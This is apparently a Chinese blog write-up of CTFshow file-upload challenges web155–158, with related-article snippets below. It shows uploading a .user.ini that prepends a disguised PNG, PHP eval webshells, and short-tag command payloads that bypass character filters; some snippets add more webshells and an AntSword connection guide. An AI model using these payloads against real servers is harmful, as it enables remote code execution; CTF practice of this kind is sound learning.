CTFshow web(php文件上传155-158)

已于 2024-02-14 23:10:57 修改 · 939 阅读 · 8
文章标签:

#php #开发语言 #CTFshow #web安全 #文件上传

于 2024-02-14 23:10:25 首次发布
文章讲述了PHP配置选项auto_append_file的作用,以及如何利用它进行后端检测。同时讨论了如何通过配置绕过安全过滤,尝试执行恶意代码,如木马。作者提醒注意PHP的安全性问题。

                                                                        web155

                                                    

老样子,还是那个后端检测。

知识点:

auto_append_file 是 PHP 配置选项之一,在 PHP 脚本执行结束后自动追加执行指定的文件。

当 auto_append_file 配置被设置为一个文件路径时,PHP 将在执行完脚本文件的所有代码后,自动加载并执行指定的文件。

这个配置选项可以用来在每个 PHP 脚本的结尾处执行一些共享的代码逻辑,例如清理工作、记录日志或执行一些全局操作。这样,就不必在每个脚本中显式编写和调用相同的代码,而是通过配置 auto_append_file 来实现统一的处理。

使用方法如下:

打开 PHP 的配置文件 php.ini。

找到 auto_append_file 配置项。

将要追加执行的文件路径设置给 auto_append_file 配置项,例如:

auto_append_file = "/path/to/your/file.php"
保存文件并重启 PHP 服务。

在接下来的 PHP 脚本执行后,指定的文件将会被自动加载和执行。

实战:先上传 .user.ini 文件,里面写入

 auto_prepend_file=111.png
(#上传时是 .user.png ,抓包修改为 .user.ini)

然后创建一个111.png文件,里面写入一句话木马<?php @eval($_POST["x"]); ?> 

之后访问/upload/

这里发现在上传111.png时不行,看来是被过滤了,那就换个<?=`tac ../flag*`木马就好了

<? echo 123;eval($_POST['x']); ?>

                                                                        web156

还是上面的套路,只是在我尝试<? echo 123;eval($_POST['x']); ?>时[]又被禁止了,这里直接换成短标签木马:

<?=`tac ../flag*`

或者直接把[]换成{}也是可以的

其他还是不变

                                                                                web157

其实不就多过滤了{}这个而已嘛,直接短标签木马上去就好了嘛

其他都和最初155一样

<?system('tac ../f*')?>

                                                                                web156

上面的<?system('tac ../f*')?>还可以继续白嫖,那么这里我也不测试这道题目比之前多过滤了什么

真诚希望我的文章能够帮助大家,谢谢!                  

补天阁
关注
ctfshow [web] 文件上传 156--160
weixin_68906365的博客
02-18 392
可以在User-Agent处写入php代码,在包含日志文件时就可以执行该代码。.user.ini 文件可以正常上传,可以先上传.user.ini 文件然后再上传写有木马的png图片,然后访问/upload页面。可以上传.user.ini文件,new.png也可以正常上传,操作和上题一样。过滤了空格,导致原 .user.ini 文件无法正常上传。可以上传 user.ini 文件,不过木马上传失败了。看了一眼题解,发现括号被过滤了,需要用反引号执行命令。短标签开启:(配置文件:php.ini)
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167
最新发布
2401_88972148的博客
01-11 1198
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow [web] 文件上传 151--155
weixin_68906365的博客
02-18 622
ctfshow文件上传151--155
ctfshow-web155(文件上传)
m0_62094846的博客
01-18 394
这题和上题差不多,上传正常png文件可以,带木马的就不行,然后就更换短标签一个个试 <?= eval($_POST[1]);?> 然后后缀换成php又不行了,更换大写又不能连接蚁剑 又用.user.ini,再上传1.png文件,在/upload/index.php下可以读取 ...
CTFshow web(文件上传158-161)
csjjjd的博客
02-16 1275
在上传.user.ini文件时,经过检测发现对文件头进行检测,所以在上传所有文件时都要加上图片格式的文件头。不管怎么上传也达不到目的,这里肯定是某个字符串被过滤了 ,使用"."一个个尝试后发现都失败了。接下来还是像之前那般先把user.ini上传,然后再上传一个文件包含,接下来访问upload。只有log进行过滤之后才可以上传成功。接下来很简单,把木马插入ua就好了。
CTF show 文件上传篇(web151-170,看这一篇就够啦)
qq_65165505的博客
09-23 1万+
涵盖ctfshow文件上传web151-web170,每一关的解题详细步骤及其思路,并且解决了解题过程中可能遇到的bug,如解决蚁剑连接{"code":"UNABLE_TO_VERIFY_LEAF_SIGNATURE"}错误等,几乎每一关也都有我总结的知识点大全,总之就一句话,ctfshow文件上传系列,看我这一篇就够了!!!!
CTFshow-文件上传web151-160
qq_52579508的博客
08-12 597
提示前端校验不可靠抓包改 后缀webshell连接获取flag。
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1411
CTFshow-文件上传
ctfshow(155-158)--文件上传漏洞--绕过黑名单
m0_56019217的博客
10-29 592
将.user.ini.png文件上传,然后抓包去掉.png后缀,就同时绕过了前端校验与MIME验证。这里注意要取消对部分符号的自动URL编码,不然编码后可以上传,但是实际上字符是被过滤了。提示文件类型不合规,但我们确实上传的是.png文件,所以推测是对文件内容的检测。发现与上一题相同,直接使用上一题的payload获取flag即可。上传shell.png,抓包测试过滤了哪些字符。直接连接/upload目录显示返回数据为空。前端校验:限制传入文件的后缀为.png。查看/upload,得到flag.
ctfshow web151-web155文件上传漏洞 wp
qq_56158055的博客
01-17 2932
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web151 先尝试最简单的,上传一个php文件 不能上传php,改个后缀,用burp suite再改回来试试 jpg也不能上传,用png尝试,然后修改为php,尝试上传 上传成功,可以利用这个来进行命令执行 接下来就可以去查找flag了 查看就行 web152 提示后端校验要严密 再次用上一题的方法上传 发现依然能上传,继续用上一题的...
ctfshow--web入门--SSRF
weixin_74985952的博客
07-09 437
gethostbyname()这里对url对应的ip地址进行了检测,因此不能使用短网址,域名解析等手段了,只能采用重定向的方式,构建一个重定向的网页,跳转至http://127.0.0.1/flag.php即可,然后将文件放入服务器中,去访问它即可。这里一样的方法,攻击redis数据库,默认生成的文件名为shell.php,将payload中带有百分号的部分进行二次编码然后进行传参即可。源码中要求http://ctf.开头,以show结尾才可以进行读取url。最后在check.php页面进行传参。
2024年最新CTFshow web(php文件上传155-158)_ctfshow155
2401_84302583的博客
05-01 385
web155web156本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTFshow Web入门 文件上传
m0_62905261的博客
10-05 1040
CTFshow Web入门 文件上传
ctfshow-web入门-文件上传web151-web160)
Welcome To Myon'Blog !
07-07 2734
试了下前端只能传 png 后缀的将一句话木马改成 png 后缀,上传后用 burpsuite 抓包绕过前端检测后,改回 php 后缀,发包拿到 flag:ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码:原本只支持上传 png 后缀的文件我们加一个 php 后缀进去,即可直接上传 php 后缀的文件。
CTFshow 文件上传 web158
Kradress的博客
02-15 336
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 发现上题的可以直接用,直接白嫖了 shell.png <?system('tac ../f*')?> 总结 …
ctfshow 文件上传 web151~170
shinygod的博客
03-22 1519
目录web151web 152web 153web 154web 155web 156 web151 上传提示,前端验证 上传.jpg文件然后抓包,改文件名为.php,加入一句话木马。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 152 同上,但对Content-Type进行了过滤。 upload/1.php?1=system("cat /var/www/html/flag.php"); web 153 过滤了php,大小写改一
CTFshow--web入门--文件上传
qq_46874275的博客
04-24 2404
~目录~开始web151 改后缀 / 禁jsweb152 改后缀web153 .user.iniweb154、155 .user.ini + 短标签web156 {}web157、158、159 反引号执行命令web160 日志包含绕过web161 幻术文件头web162、163 session文件包含+条件竞争 开始 挑简单的先来 web151 改后缀 / 禁js 上传一个一句话,要求是图片格式,否则传不上去 <?php @eval($_POST['a']) ?> 然后抓包修改后缀为php
CTFshow web(php文件上传155-158)_ctfshow155,2024年最新网络安全小技巧
2401_84164503的博客
04-09 799
web156或者直接把[]换成{}也是可以的。
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
ctfshow web入门文件上传蚁剑连接
01-02
### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作 为了成功完成文件上传并利用蚁剑建立连接,需先准备环境。确保已安装蚁剑客户端,并准备好用于测试的恶意PHP脚本。 #### PHP Shell Payload 创建 创建一个简单的PHP反向Shell脚本 `shell.php`: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段允许通过POST请求执行任意命令[^1]。 #### 文件上传过程 使用给定URL进行文件上传操作。假设目标地址为 `http://example.com/upload` ,则可构造如下表单数据提交至服务器: ```html <form action="http://example.com/upload" method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload File" name="submit"> </form> ``` 将之前编写的 `shell.php` 作为待上传文件选择并提交[^2]。 #### 验证上传成果 确认文件是否成功上载到远程服务器指定目录下。通常情况下,可以通过浏览器直接访问该路径来验证,例如:`http://example.com/uploads/shell.php` 。如果页面返回空白,则说明上传成功。 #### 使用蚁剑连接 启动蚁剑工具,在新建站点时输入相应的参数配置: - **网站根目录**: `/var/www/html/` - **WebShell URL**: 如前所述成功的PHP shell链接 - **密码**: 设置于PHP代码中的密钥 (`cmd`) 按照上述设置完成后点击“保存”,随后即可尝试与远端服务器建立会话连接[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值